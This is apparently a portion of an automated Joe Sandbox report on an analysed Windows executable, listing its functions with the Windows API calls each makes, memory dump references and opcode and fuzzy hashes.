                                                                                                                                                                                                                                  • Opcode ID: 1033d3b689308e531f23a58ea7e060c57c4d5fcd21d8386313e035387aa36511
                                                                                                                                                                                                                                  • Instruction ID: bc5a1db7f6e2798750283b3bead05420b29d5a6b0bbc3b81b988f913e5be1e8f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1033d3b689308e531f23a58ea7e060c57c4d5fcd21d8386313e035387aa36511
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D701D8307942147BFB2067A9DC8AF793F5ADB8DB11F100021F318AE1E1C9F154568BA9
                                                                                                                                                                                                                                  Function 009F2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,009F1D95,?,?,00000000), ref: 009F2159
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,009F1D95,?,?,00000000), ref: 009F2160
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009F1D95,?,?,00000000), ref: 009F2175
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,009F1D95,?,?,00000000), ref: 009F217D
                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,009F1D95,?,?,00000000), ref: 009F2180
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009F1D95,?,?,00000000), ref: 009F2190
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(009F1D95,00000000,?,009F1D95,?,?,00000000), ref: 009F2198
                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,009F1D95,?,?,00000000), ref: 009F219B
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,009F21C1,00000000,00000000,00000000), ref: 009F21B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1957940570-0
                                                                                                                                                                                                                                  • Opcode ID: f1c47f6115c1a4123cb61bfcefce7c89d73a42a23ae4d298854bd874d87d1cf6
                                                                                                                                                                                                                                  • Instruction ID: 5c50ec817090f20b774410db33a92cd4db520edc3e0f97edefc40781f4b98fe6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1c47f6115c1a4123cb61bfcefce7c89d73a42a23ae4d298854bd874d87d1cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6301BFB5640304BFE720EFA9DC4EF677BACEB88711F004521FA05DB1A1C6709812CB60
                                                                                                                                                                                                                                  Function 00A1AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009FDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 009FDDAC
                                                                                                                                                                                                                                    • Part of subcall function 009FDD87: Process32FirstW.KERNEL32(00000000,?), ref: 009FDDBA
                                                                                                                                                                                                                                    • Part of subcall function 009FDD87: FindCloseChangeNotification.KERNEL32(00000000), ref: 009FDE87
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A1ABCA
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00A1ABDD
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A1AC10
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A1ACC5
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00A1ACD0
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1AD21
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                  • API String ID: 1701285019-2896544425
                                                                                                                                                                                                                                  • Opcode ID: 431aa43548acb164684790fa6b500f9517e9f530afeac1ed3499b29faaf39467
                                                                                                                                                                                                                                  • Instruction ID: 63fde9ad9029ebeb2043a7842ffc6d1fedae00380d5e42597109c29ab0cbaa8f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 431aa43548acb164684790fa6b500f9517e9f530afeac1ed3499b29faaf39467
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C61B074209641AFD720DF58C495F65BBE1AF94308F14849CE46A8FBA3C771EC86CB92
                                                                                                                                                                                                                                  Function 00A24322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A243C1
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A243D6
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A243F0
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A24435
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A24462
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A24490
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                                                                                                  • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                  • Opcode ID: 380a5f74bbe32178ff630f278f543d3977408906fda4edcb6b1d8e60b3c39516
                                                                                                                                                                                                                                  • Instruction ID: 7479a9a4e3f154e839b96ee52c00176ef8a8b192b330fc2c2872f9fe185d8210
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 380a5f74bbe32178ff630f278f543d3977408906fda4edcb6b1d8e60b3c39516
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B41CE31900328ABDB21DFA8DC49BEA7BA9FB4C360F100526F944EB291D7749980CB90
                                                                                                                                                                                                                                  Function 009FC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009FC6C4
                                                                                                                                                                                                                                  • IsMenu.USER32(00000000), ref: 009FC6E4
                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 009FC71A
                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(019B5780), ref: 009FC76B
                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(019B5780,?,00000001,00000030), ref: 009FC793
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                  • String ID: 0$2
                                                                                                                                                                                                                                  • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                  • Opcode ID: 843c0f2ca130d703ad7d4929d1d1107be61548917c13f620ae01b72af292adfa
                                                                                                                                                                                                                                  • Instruction ID: 1033b55201596926ce1582435ea1765d5992972c10aae9856cea763aeafe5d1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 843c0f2ca130d703ad7d4929d1d1107be61548917c13f620ae01b72af292adfa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 265192B060020D9BDF20EFA8DA84BBEBBF9AF54314F24C52AE611E7295D3709945CF51
                                                                                                                                                                                                                                  Function 009FD11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 009FD1BE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                  • Opcode ID: da07545f9231e9fea4194fcf5286b0f9195c42e6c474d410c09b4ac459537ae2
                                                                                                                                                                                                                                  • Instruction ID: 4b12796241ec54fd1589c027ccbb9a7108ccebe3efa0f6b5418ddea8fe90c4fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da07545f9231e9fea4194fcf5286b0f9195c42e6c474d410c09b4ac459537ae2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1911DA3534D30EBEEB0D5B54EC82EBE779DAF49761B20042AFA04A61C2E7B47A415360
                                                                                                                                                                                                                                  Function 009FE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                                                                                  • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                  • Opcode ID: e59169472270f67cf61718f8a6c5f39095cbf91adcb1d08548569dccd252e5cb
                                                                                                                                                                                                                                  • Instruction ID: d3af4fa18e8f81d38056f68801b07f5bcdb232a86e3735db780a45e8ae2aa459
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e59169472270f67cf61718f8a6c5f39095cbf91adcb1d08548569dccd252e5cb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F711B4319041197FDB24B764DD4AEFE77ACEF41720F1000B5F645A60A2EF748A869790
                                                                                                                                                                                                                                  Function 009FF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 952045576-0
                                                                                                                                                                                                                                  • Opcode ID: cc6f3472e8cd362a09c056b0e535b686855306b7833c8743f138612a747e5812
                                                                                                                                                                                                                                  • Instruction ID: 59dda1b2b9c9f9214bb3be31a0c205aab22e6dcee72b9b7883a9afd7e97de9fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc6f3472e8cd362a09c056b0e535b686855306b7833c8743f138612a747e5812
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41A566C11118B5CB11FBB8CD8ABDFB768AF45720F504466E508E3121FB34E251C7A6
                                                                                                                                                                                                                                  Function 009AFBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 009AFC41
                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 009EFC15
                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 009EFC98
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                                                                                                  • Opcode ID: 7dd95e3a866a514123c7f639017769f1daf2b53da3843392a3a4a4c9f49718fc
                                                                                                                                                                                                                                  • Instruction ID: 4032ee5481bd4bf3cb67ced6b520f79300934d184ad3dc4b06f6ef469b9910a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dd95e3a866a514123c7f639017769f1daf2b53da3843392a3a4a4c9f49718fc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D04119316087C89AC7358BBFC9B87397BB5AB87320F34493DE9C6469A1C679A841C750
                                                                                                                                                                                                                                  Function 00A2379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00A237B7
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00A237BF
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A237CA
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00A237D6
                                                                                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A23812
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A23823
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A26504,?,?,000000FF,00000000,?,000000FF,?), ref: 00A2385E
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A2387D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                                                                                                  • Opcode ID: 896d142b07c971d81feb7b3996d96b421b56fe5f20b64567684e322654fdcc4b
                                                                                                                                                                                                                                  • Instruction ID: b30ade1d054b0df7b5f2235f7a07b68e7098f72907a56cc2308446978a3eae8c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 896d142b07c971d81feb7b3996d96b421b56fe5f20b64567684e322654fdcc4b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18318F721012247FEF218F58DC49FFB3BA9EB4A711F044065FE099A191C6B99842C7A4
                                                                                                                                                                                                                                  Function 00A15A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                                                                                                                  • Opcode ID: 8e2fa427864d29a0cfab4d9112624db6e2421a8b2625f86c3d8a60ce6ed1e256
                                                                                                                                                                                                                                  • Instruction ID: 05412fe3bc5132dd17145ab0438b26ba1dbc974c8010cf6cc7778f944f0de95d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e2fa427864d29a0cfab4d9112624db6e2421a8b2625f86c3d8a60ce6ed1e256
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92D1A071E0060ADFDB10CFA8D885AEEB7B5FF88344F148569E915AB281E770ED85CB50
                                                                                                                                                                                                                                  Function 009D18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009D194E
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D19D1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009D1B7B,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D1A64
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D1A7B
                                                                                                                                                                                                                                    • Part of subcall function 009C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D1AF7
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 009D1B22
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 009D1B2E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2829977744-0
                                                                                                                                                                                                                                  • Opcode ID: 12f5795d6f324ab9574bb522c7ad1f96c4b3522c0d062a1de8fb4148db525974
                                                                                                                                                                                                                                  • Instruction ID: 1da307dff5356a3d78e2558b789841e9009d4ff8be9a7bc094661a21aaeb327d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12f5795d6f324ab9574bb522c7ad1f96c4b3522c0d062a1de8fb4148db525974
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3191B673E80216BADB248EA4D851EEEBBB99F49310F18851BE805E7341E739DD41C760
                                                                                                                                                                                                                                  Function 00A14F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
